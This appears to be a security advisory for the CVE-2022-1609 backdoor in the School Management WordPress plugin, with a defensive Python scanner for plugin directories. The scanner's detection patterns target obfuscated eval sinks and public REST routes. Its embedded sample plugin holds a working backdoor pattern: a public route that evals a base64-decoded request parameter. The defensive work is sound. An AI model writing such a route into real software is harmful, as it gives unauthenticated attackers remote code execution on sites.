PT-2022-3361 · Weblizar · School Management WordPress Plugin

Harald Eilertsen

·

Published

2022-05-04

·

Updated

2024-01-22

·

CVE-2022-1609

CVSS v3.1

10

Critical

Vector

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions

School Management WordPress plugin versions prior to 9.9.7
Description

An obfuscated backdoor was injected into the license-checking code of the School Management WordPress plugin. The backdoor registers a REST API handler that executes PHP code supplied in the request, so an unauthenticated attacker can run arbitrary PHP on the site and take full control of the WordPress installation. The backdoor was found in premium versions of the plugin prior to 9.9.7 and is rated critical. The potential exposure is large: Weblizar, the plugin's vendor, claims more than 340,000 customers across its premium and free WordPress themes and plugins, so the estimated number of potentially affected sites is over 340,000.
Recommendations

Update the School Management WordPress plugin to version 9.9.7 or later. If updating is not immediately possible, deactivate the plugin, or at minimum disable the REST API handler registered by its license-checking code, since that code is where the backdoor lives. Because the backdoor is reachable without authentication, treat any site that ran an affected premium version as potentially compromised: review the plugin directory and the rest of wp-content for other injected code, check for unexpected administrator accounts and scheduled tasks, and rotate credentials and keys stored on the site.
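The description above names the two hallmarks of this backdoor (an obfuscated code-execution primitive inside the license-checking code, and a REST route open to unauthenticated callers), and the recommendations turn on whether an installed version is older than 9.9.7. The script below is an added triage example, not code from Weblizar or from this advisory: it reads the plugin's Version header, compares it against the fixed release, and scans PHP sources for eval/assert/create_function sinks wrapped around decoders and for register_rest_route() calls that are public. The regexes, the function names and the embedded sample plugin are constructed for illustration and do not reproduce the real backdoor.

```python
"""Heuristic triage of WordPress plugin sources for the two hallmarks named in
the advisory: an obfuscated code-execution sink (eval over a decoded string)
and a REST route that is open to unauthenticated callers.

Added example, not Weblizar's code. Patterns and the sample plugin below are
constructed for illustration and do not reproduce the real backdoor."""
import re
from dataclasses import dataclass
from pathlib import Path
from typing import Optional

# Code-execution sinks that deserve a manual look wherever they appear.
EXEC_CALL = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
# Decoders that obfuscated payloads are typically wrapped in.
DECODER = re.compile(
    r"\b(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13|strrev|hex2bin)\s*\(",
    re.I)
# A register_rest_route() call up to its terminating ');'. The non-greedy match
# stops early if the arguments contain an inline closure with ';' inside it;
# such routes are still reported, only with a truncated snippet.
REST_ROUTE = re.compile(r"register_rest_route\s*\((.*?)\)\s*;", re.S)
OPEN_PERMISSION = re.compile(r"permission_callback['\"]?\s*=>\s*['\"]__return_true['\"]")
VERSION_HEADER = re.compile(r"^[\s*#/]*Version:\s*([0-9][0-9A-Za-z.\-]*)", re.M)


@dataclass(frozen=True)
class Finding:
    file: str
    line: int
    kind: str
    snippet: str


def _line_of(text: str, offset: int) -> int:
    return text.count("\n", 0, offset) + 1


def scan_source(text: str, name: str = "<memory>") -> list:
    """Return findings for one PHP source file."""
    findings = []
    for m in EXEC_CALL.finditer(text):
        # Inspect the sink's argument (up to the first ';') for a decoder.
        arg = text[m.end():m.end() + 300].split(";", 1)[0]
        kind = "obfuscated_exec" if DECODER.search(arg) else "dynamic_exec"
        findings.append(Finding(name, _line_of(text, m.start()), kind,
                                (m.group(0) + arg).strip()[:80]))
    for m in REST_ROUTE.finditer(text):
        args = m.group(1)
        if OPEN_PERMISSION.search(args):
            kind = "rest_route_open"            # explicitly public
        elif "permission_callback" not in args:
            kind = "rest_route_no_permission"   # WordPress treats this as public
        else:
            continue
        findings.append(Finding(name, _line_of(text, m.start()), kind,
                                " ".join(args.split())[:80]))
    return findings


def scan_plugin_dir(root: str) -> list:
    """Scan every .php file under a plugin directory (wp-content/plugins/<slug>)."""
    findings = []
    for path in sorted(Path(root).rglob("*.php")):
        findings.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return findings


def plugin_version(header_text: str) -> Optional[str]:
    """Read 'Version:' from the plugin header comment, or None if absent."""
    m = VERSION_HEADER.search(header_text)
    return m.group(1) if m else None


def is_affected(version: str, fixed: str = "9.9.7") -> bool:
    """True when version sorts before the fixed release (9.9.7 for this advisory).
    Version alone is not proof of a backdoor: the advisory reports it in premium
    builds, so an affected version still warrants the source scan above."""
    key = lambda v: tuple(int(p) for p in re.findall(r"\d+", v))
    return key(version) < key(fixed)


# Constructed sample of the shape the advisory describes: a public REST route
# whose handler evals a decoded request parameter. Not Weblizar's code.
SAMPLE_PLUGIN = """<?php
/*
Plugin Name: Example Plugin (constructed sample)
Version: 9.9.6
*/
add_action('rest_api_init', function () {
    register_rest_route('example/v1', '/license', array(
        'methods'             => 'POST',
        'callback'            => 'example_license_check',
        'permission_callback' => '__return_true',
    ));
});
function example_license_check($request) {
    $blob = $request->get_param('blob');
    eval(base64_decode($blob));
}
"""

if __name__ == "__main__":
    for f in scan_source(SAMPLE_PLUGIN, "sample.php"):
        print(f"{f.file}:{f.line} {f.kind}: {f.snippet}")
    print("affected:", is_affected(plugin_version(SAMPLE_PLUGIN) or "0"))
```

Run scan_plugin_dir() against the installed plugin directory; every obfuscated_exec or rest_route_open hit in license or activation code is a manual review item, and a version below 9.9.7 means the update and the compromise checks above apply regardless of what the scan finds.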

Exploit

Fix

RCE

Code Injection

Weakness Enumeration

Related Identifiers

BDU:2022-04122
CVE-2022-1609

Affected Products

School Management WordPress Plugin